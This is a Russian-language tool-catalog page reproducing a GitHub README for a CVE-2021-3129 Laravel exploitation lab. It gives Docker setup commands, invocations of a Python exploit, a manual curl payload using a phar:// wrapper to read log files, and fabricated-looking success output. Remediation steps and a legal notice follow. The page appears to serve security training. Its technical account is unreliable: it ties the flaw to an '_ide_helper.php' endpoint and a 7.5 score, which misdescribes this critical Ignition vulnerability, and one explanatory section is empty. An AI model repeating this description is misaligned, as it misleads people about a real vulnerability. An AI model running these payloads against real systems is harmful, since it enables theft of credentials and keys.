Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-3129-Lab — CVE-2021-3129: Laravel Debug Mode RCE — Полная лаборатория эксплуатации с Python-эксплойтом, Docker-контейнером и руководством по анализу безопасности. | Kitploit
Инструменты/GitHubGitHub/thenareshofficial/cve-2021-3129-lab
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubthenareshofficial/cve-2021-3129-lab

CVE-2021-3129-Lab

CVE-2021-3129: Laravel Debug Mode RCE — Полная лаборатория эксплуатации с Python-эксплойтом, Docker-контейнером и руководством по анализу безопасности.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
1 месяц назадЕщё не проверено

CVE-2021-3129: Лаборатория RCE для режима отладки Laravel

License: MIT Python 3.8+ Docker CVSS: 7.5

Практическая лаборатория для эксплуатации CVE-2021-3129 — критической уязвимости Laravel, позволяющей неавторизованное чтение файлов и потенциальное удалённое выполнение кода (RCE).

Быстрый старт

root@kitploit:~
# Clone
git clone https://github.com/theNareshofficial/CVE-2021-3129-Lab.git
cd CVE-2021-3129-Lab

# Build & Run
docker build -t cve-2021-3129-lab:latest .
docker run -d --name laravel-cve-2021-3129 -p 8080:80 cve-2021-3129-lab:latest

# Test
curl http://localhost:8080/_ide_helper.php

# Exploit
python3 cve_2021_3129_exploit.py http://localhost:8080

Что такое CVE-2021-3129?

Как это работает

  1. Разведка — обнаружение Laravel с включённым режимом отладки
  2. Проверка — тестирование эндпоинта /_ide_helper.php
  3. Эксплуатация — использование обёртки phar:// для чтения файлов
  4. Воздействие — извлечение учётных данных, ключей API, переменных окружения

Предварительные требования

  • Docker Desktop
  • Python 3.8+
  • 4 ГБ ОЗУ

Настройка (пошагово)

root@kitploit:~
# 1. Clone
git clone https://github.com/theNareshofficial/CVE-2021-3129-Lab.git
cd CVE-2021-3129-Lab

# 2. Build container
docker build -t cve-2021-3129-lab:latest .

# 3. Run container
docker run -d --name laravel-cve-2021-3129 -p 8080:80 cve-2021-3129-lab:latest

# 4. Verify endpoint
curl http://localhost:8080/_ide_helper.php

# 5. Run exploit
python3 cve_2021_3129_exploit.py http://localhost:8080

Ожидаемый вывод

root@kitploit:~
[✓✓✓] CVE-2021-3129 VULNERABILITY CONFIRMED!

VULNERABILITY DETAILS:
- Debug mode is ENABLED (APP_DEBUG=true)
- _ide_helper.php is ACCESSIBLE
- Arbitrary file read is POSSIBLE
- Sensitive information LEAKED

Использование эксплойта

root@kitploit:~
# Basic
python3 cve_2021_3129_exploit.py http://localhost:8080

# Custom timeout
python3 cve_2021_3129_exploit.py http://localhost:8080 --timeout 10

# Help
python3 cve_2021_3129_exploit.py -h

Ручное тестирование

root@kitploit:~
# Test endpoint
curl http://localhost:8080/_ide_helper.php

# Test with payload
curl 'http://localhost:8080/_ide_helper.php?subject=phar://storage/logs/laravel.log'

Устранение уязвимости

root@kitploit:~
# 1. Set APP_DEBUG=false in .env
# 2. Remove _ide_helper.php
# 3. Update Laravel to patched version (8.4.2+, 7.30.4+)
# 4. Restart application

Очистка

root@kitploit:~
# Stop container
docker stop laravel-cve-2021-3129

# Remove container
docker rm laravel-cve-2021-3129

# Remove image
docker rmi cve-2021-3129-lab:latest

Часто задаваемые вопросы (FAQ)

В: Могу ли я тестировать в интернете?
О: Нет. Только на локальном хосте. Никогда не тестируйте на системах, которые вам не принадлежат.

В: Будет ли это работать на исправленных версиях?
О: Нет. Laravel 8.4.2+ и 7.30.4+ содержат исправление.

В: Могу ли я модифицировать эксплойт?
О: Да. Код полностью закомментирован для обучения.

В: Как захватить сетевой трафик?
О: Используйте tcpdump или Wireshark:

root@kitploit:~
sudo tcpdump -i lo -w capture.pcapng 'tcp port 8080'
# In another terminal, run the exploit
python3 cve_2021_3129_exploit.py http://localhost:8080
# Open capture: wireshark capture.pcapng

Правовое уведомление

⚠️ Только в образовательных целях

✅ Разрешённое использование:

  • Образовательное обучение
  • Авторизованное тестирование безопасности
  • Защитные исследования

❌ Запрещённое использование:

  • Несанкционированный доступ к системам
  • Нелегальный взлом
  • Нанесение вреда системам

Используйте только на системах, которыми вы владеете или на тестирование которых у вас есть явное разрешение.

Ресурсы

  • CVE-2021-3129
  • Безопасность Laravel
  • Обёртки PHP

Автор

Naresh R (@theNareshofficial)

  • GitHub: https://github.com/theNareshofficial
  • YouTube: https://www.youtube.com/@nareshtechweb930
  • Местоположение: Bengaluru, Karnataka, India

Лицензия

Лицензия MIT — см. файл LICENSE.

Скачать инструмент
СвойствоПодробности
СерьёзностьCVSS 7.5 (Высокая)
Затрагиваемые версииLaravel < 8.4.2, < 7.30.4
ВоздействиеЧтение произвольных файлов, раскрытие информации, потенциальный RCE
Требуется аутентификацияНет
Вектор атакиСеть